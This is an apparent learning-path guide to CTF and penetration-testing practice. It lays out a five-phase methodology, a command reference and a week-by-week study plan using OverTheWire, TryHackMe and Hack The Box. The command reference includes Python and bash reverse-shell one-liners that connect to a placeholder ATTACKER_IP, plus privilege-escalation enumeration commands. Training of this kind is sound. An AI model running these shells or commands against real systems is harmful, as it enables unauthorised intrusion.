โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  searchsploit [service] [version]                            โ”‚ โ”‚
โ”‚  โ”‚  Google: "service version exploit"                           โ”‚ โ”‚
โ”‚  โ”‚  Check CVE databases                                          โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ”‚  Test for common vulnerabilities:                                  โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  Web: SQLi, XSS, LFI, RFI, command injection                 โ”‚ โ”‚
โ”‚  โ”‚  SMB: EternalBlue, anonymous access, weak creds               โ”‚ โ”‚
โ”‚  โ”‚  SSH: Weak credentials, key reuse                             โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  PHASE 3: INITIAL EXPLOITATION                                    โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                    โ”‚
โ”‚  Gain initial access:                                              โ”‚
โ”‚  - Exploit identified vulnerability                                โ”‚
โ”‚  - Use Metasploit or manual exploit                               โ”‚
โ”‚  - Catch reverse shell                                             โ”‚
โ”‚                                                                    โ”‚
โ”‚  Stabilize shell:                                                  โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  python3 -c 'import pty; pty.spawn("/bin/bash")'             โ”‚ โ”‚
โ”‚  โ”‚  export TERM=xterm                                            โ”‚ โ”‚
โ”‚  โ”‚  Ctrl+Z โ†’ stty raw -echo; fg                                  โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  PHASE 4: POST-EXPLOITATION / PRIVILEGE ESCALATION                โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                    โ”‚
โ”‚  Linux Enumeration:                                                โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  sudo -l                    # What can I sudo?               โ”‚ โ”‚
โ”‚  โ”‚  find / -perm -4000 2>/dev/null  # SUID binaries            โ”‚ โ”‚
โ”‚  โ”‚  cat /etc/crontab          # Scheduled tasks                 โ”‚ โ”‚
โ”‚  โ”‚  ls -la /home              # Other users                     โ”‚ โ”‚
โ”‚  โ”‚  cat /etc/passwd           # User accounts                   โ”‚ โ”‚
โ”‚  โ”‚  linpeas.sh                # Automated enumeration           โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ”‚  Windows Enumeration:                                              โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  whoami /priv              # Current privileges              โ”‚ โ”‚
โ”‚  โ”‚  net user                  # User accounts                   โ”‚ โ”‚
โ”‚  โ”‚  systeminfo                # System information              โ”‚ โ”‚
โ”‚  โ”‚  winpeas.exe               # Automated enumeration           โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ”‚  Common Privilege Escalation Vectors:                              โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  Linux:                                                       โ”‚ โ”‚
โ”‚  โ”‚    - Sudo misconfiguration (GTFOBins)                        โ”‚ โ”‚
โ”‚  โ”‚    - SUID binary exploitation                                 โ”‚ โ”‚
โ”‚  โ”‚    - Cron job with writable script                           โ”‚ โ”‚
โ”‚  โ”‚    - Kernel exploit                                           โ”‚ โ”‚
โ”‚  โ”‚    - Password reuse                                           โ”‚ โ”‚
โ”‚  โ”‚                                                               โ”‚ โ”‚
โ”‚  โ”‚  Windows:                                                     โ”‚ โ”‚
โ”‚  โ”‚    - SeImpersonatePrivilege (Potato attacks)                 โ”‚ โ”‚
โ”‚  โ”‚    - Unquoted service paths                                   โ”‚ โ”‚
โ”‚  โ”‚    - Weak service permissions                                 โ”‚ โ”‚
โ”‚  โ”‚    - AlwaysInstallElevated                                    โ”‚ โ”‚
โ”‚  โ”‚    - Stored credentials                                       โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  PHASE 5: CAPTURE FLAGS AND DOCUMENT                              โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                    โ”‚
โ”‚  - Get user.txt and root.txt                                      โ”‚
โ”‚  - Document every step taken                                       โ”‚
โ”‚  - Write up lessons learned                                        โ”‚
โ”‚  - Note tools and techniques for future reference                  โ”‚
โ”‚                                                                    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Standard Penetration Testing Methodology for CTF - Five Phase Framework

Essential Command Reference

# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
# RECONNAISSANCE COMMANDS
# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

# Initial fast scan
nmap -sV -sC -oN nmap_initial.txt $IP

# Full port scan
nmap -p- --min-rate=10000 -oN nmap_full.txt $IP

# Detailed scan on specific ports
nmap -sV -sC -p 80,443,22 -oN nmap_detail.txt $IP

# Web directory brute-force
gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt

# Virtual host enumeration
gobuster vhost -u http://$DOMAIN -w /usr/share/wordlists/subdomains.txt

# SMB enumeration
smbclient -L //$IP -N
smbmap -H $IP
enum4linux -a $IP

# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
# EXPLOITATION COMMANDS
# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

# Reverse shell listener
nc -lvnp 4444

# Python reverse shell (on target)
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Stabilize shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice

# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
# PRIVILEGE ESCALATION (Linux)
# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

# Current user context
id
whoami
groups

# Sudo permissions
sudo -l

# SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Capabilities
getcap -r / 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# Running processes
ps aux
ps aux | grep root

# Network connections
netstat -tulpn
ss -tulpn

# Interesting files
find / -name "*.txt" -o -name "*.conf" -o -name "*.bak" 2>/dev/null
find / -writable -type f 2>/dev/null

# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
# PRIVILEGE ESCALATION (Windows)
# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

# Current user
whoami
whoami /priv
whoami /groups

# System info
systeminfo
hostname

# Users
net user
net user Administrator

# Network
netstat -ano
ipconfig /all

# Services
sc query
wmic service list brief

# Scheduled tasks
schtasks /query /fo LIST /v

Phased Implementation Guide

Phase 1: Environment Setup (Day 1)

Goal: Have all platforms and tools ready

  1. Create accounts:
  2. Set up Kali Linux:
    • VirtualBox/VMware with Kali Linux VM
    • Minimum 4GB RAM, 50GB disk
    • NAT or bridged networking
  3. Connect to VPN (for HTB):
    • Download .ovpn file from HTB
    • sudo openvpn your-file.ovpn
    • Verify with ip addr (tun0 interface)
  4. Organize notes:
    • Create git repository for writeups
    • Set up note-taking system (Obsidian, Notion, or Markdown)

Phase 2: OverTheWire Bandit (Days 1-3)

Goal: Master Linux command line fundamentals

Approach:

  1. SSH to bandit.labs.overthewire.org port 2220
  2. User: bandit0, Password: bandit0
  3. Each levelโ€™s password unlocks the next

Key skills by level range:

  • 0-5: Basic file reading (cat, ls, cd)
  • 6-10: File finding (find, grep)
  • 11-15: Text processing (sort, uniq, tr)
  • 16-20: Networking and SSH
  • 21-25: Cron, processes, scripting
  • 26-34: Advanced concepts

Example solution for Level 0:

# Bandit Level 0 โ†’ 1

## Objective
Find the password in the file 'readme' in the home directory.

## Solution
```bash
ssh bandit0@bandit.labs.overthewire.org -p 2220
# Password: bandit0

ls
cat readme
# Password for bandit1: [hidden]

Lessons Learned

  • Basic SSH connection
  • Reading files with cat
  • Listing directory contents ```

Phase 3: TryHackMe Beginner Path (Week 1-2)

Goal: Complete structured learning path

Recommended order:

  1. Linux Fundamentals 1-3 (reinforce Bandit skills)
  2. Network Fundamentals
  3. How The Web Works
  4. Web Fundamentals
  5. Burp Suite Basics
  6. OWASP Top 10
  7. Basic Pentesting

For each room:

  1. Read all the material (donโ€™t skip theory)
  2. Take notes on new concepts
  3. Complete all tasks
  4. Write brief summary of what you learned

Phase 4: Your First Hack The Box Machine (Week 2)

Goal: Complete an โ€œEasyโ€ machine end-to-end

Choose a retired machine (writeups available for when youโ€™re stuck):

  • โ€œLameโ€ (very beginner friendly)
  • โ€œLegacyโ€ (Windows, beginner)
  • โ€œBlueโ€ (EternalBlue, famous exploit)

Approach:

  1. Spend at least 2 hours before looking at hints
  2. Enumerate EVERYTHING
  3. When stuck, check forum hints (not full writeups)
  4. After completion, read other writeups to learn different approaches

Example writeup structure:

# Hack The Box: Lame

## Machine Info
- IP: 10.10.10.3
- OS: Linux
- Difficulty: Easy
- Date: 2024-XX-XX

## Enumeration

### Nmap Scan
```bash
nmap -sV -sC -oN nmap.txt 10.10.10.3

Results:

  • 21/tcp - vsftpd 2.3.4
  • 22/tcp - OpenSSH 4.7p1
  • 139/tcp - Samba smbd 3.X
  • 445/tcp - Samba smbd 3.0.20

Research

Searched โ€œsamba 3.0.20 exploitโ€ - found CVE-2007-2447 (username map script)

Exploitation

Used Metasploit module: exploit/multi/samba/usermap_script [detailsโ€ฆ]

Post-Exploitation

Landed as root, found flag in /root/root.txt

Lessons Learned

  1. Always check service versions against exploitdb
  2. Old services often have public exploits
  3. Samba is a common attack vector ```

Phase 5: Build Your Pattern Library (Weeks 3-8)

Goal: Complete 30+ challenges across categories

Track your progress:

# CTF Progress Tracker

## TryHackMe
- [x] Linux Fundamentals 1
- [x] Linux Fundamentals 2
- [x] Linux Fundamentals 3
- [x] Vulnversity
- [ ] Kenobi
...

## Hack The Box Easy (5/5)
- [x] Lame (Linux)
- [x] Legacy (Windows)
- [ ] Blue (Windows)
- [ ] Devel (Windows)
- [ ] Beep (Linux)

## Hack The Box Medium (0/5)
...

Common Pitfalls and Debugging

1. โ€œI canโ€™t find anything with enumerationโ€

Problem: Nmap shows open ports but you donโ€™t know what to do

Solution: Enumerate harder

  • Did you scan ALL ports? (-p-)
  • Did you check for UDP? (-sU)
  • Did you brute-force directories?
  • Did you check for subdomains/vhosts?
  • Did you search exploit-db for EVERY service version?

2. โ€œMy exploit doesnโ€™t workโ€

Problem: Metasploit says success but no shell

Debug steps:

  1. Is your IP correct? (ip addr)
  2. Is the VPN connected? (ping target)
  3. Are you using the right payload?
  4. Is the target vulnerable? (check version exactly)
  5. Try a different exploit or manual exploitation

3. โ€œIโ€™m stuck on privilege escalationโ€

Problem: Have user shell, canโ€™t get root

Escalation checklist:

# Run these EVERY time
sudo -l                                    # What can I sudo?
cat /etc/crontab                          # Cron jobs?
find / -perm -4000 2>/dev/null            # SUID binaries?
ls -la /home/*/                           # Other user files?
cat /etc/passwd                           # Users?
ps aux | grep root                        # Root processes?
find / -writable -type f 2>/dev/null      # Writable files?

If still stuck, run LinPEAS/WinPEAS for automated enumeration.

4. โ€œI keep running out of timeโ€

Problem: Spending hours with no progress

Solution: Time-box your approach

  • 30 min: Initial enumeration
  • 30 min: Service-specific enumeration
  • 30 min: Research/exploit search
  • 30 min: Exploitation attempts
  • After 2 hours with no progress โ†’ look at hints
  • After 3 hours โ†’ watch walkthrough and learn

Testing Your Skills

Self-Assessment Checkpoints

After Week 2 - You should be able to:

  • Use basic Linux commands fluently
  • Run Nmap scans and interpret results
  • Find hidden web directories
  • Identify service versions
  • Search for known exploits

After Week 4 - You should be able to:

  • Complete an Easy HTB machine unassisted
  • Write a complete challenge writeup
  • Stabilize a reverse shell
  • Enumerate for privilege escalation
  • Use GTFOBins/LOLBAS

After Week 8 - You should be able to:

  • Complete Medium HTB machines
  • Identify vulnerabilities without hints
  • Chain multiple exploits
  • Explain your methodology to others
  • Recognize vulnerability patterns quickly

Extensions and Challenges

Beginner Extensions

  1. Participate in a live CTF: Check CTFtime for upcoming events
  2. Start a blog: Share your writeups publicly
  3. Help others: Answer questions in TryHackMe/HTB forums

Intermediate Extensions

  1. Binary exploitation: Complete pwnable.kr challenges
  2. Bug bounty: Apply skills to real programs (HackerOne, Bugcrowd)
  3. Certification prep: OSCP, PNPT, eJPT

Advanced Extensions

  1. Create your own CTF challenges: Teach by creating
  2. Red team operations: HTB Pro Labs
  3. Contribute to tools: Improve open-source security tools

Real-World Connections

From CTF to Career

CTF skills directly transfer to:

CTF Category Real-World Application
Boot2Root Penetration testing
Web Bug bounty, web app assessment
Binary Vulnerability research
Forensics Incident response, DFIR
Crypto Cryptanalysis, secure development

Building Your Portfolio

Your writeup repository becomes:

  • Interview material: โ€œLet me show you how I approached thisโ€ฆโ€
  • Proof of skills: More valuable than certifications alone
  • Teaching resource: Help others learn
  • Personal reference: Remind yourself of techniques

Resources

Primary Platforms

Reference Materials

Video Walkthroughs

Books

  • โ€œLinux Basics for Hackersโ€ by OccupyTheWeb
  • โ€œPenetration Testingโ€ by Georgia Weidman
  • โ€œThe Hacker Playbook 3โ€ by Peter Kim

Self-Assessment Checklist

Foundation Complete

  • Completed OverTheWire Bandit (all 34 levels)
  • Completed TryHackMe beginner path
  • Have working Kali Linux environment
  • Can stabilize shells reliably

Skill Building Complete

  • Completed 5 Easy HTB machines
  • Written 10+ detailed writeups
  • Know basic privilege escalation vectors
  • Can use Metasploit effectively

Intermediate Complete

  • Completed 5 Medium HTB machines
  • Can approach new machines systematically
  • Participated in at least 1 live CTF
  • Have a public writeup portfolio

Understanding

  • Can explain your methodology to others
  • Know when to use which tools
  • Recognize common vulnerability patterns
  • Understand the โ€œwhyโ€ behind exploits

This project is part of the Ethical Hacking & Penetration Testing learning path.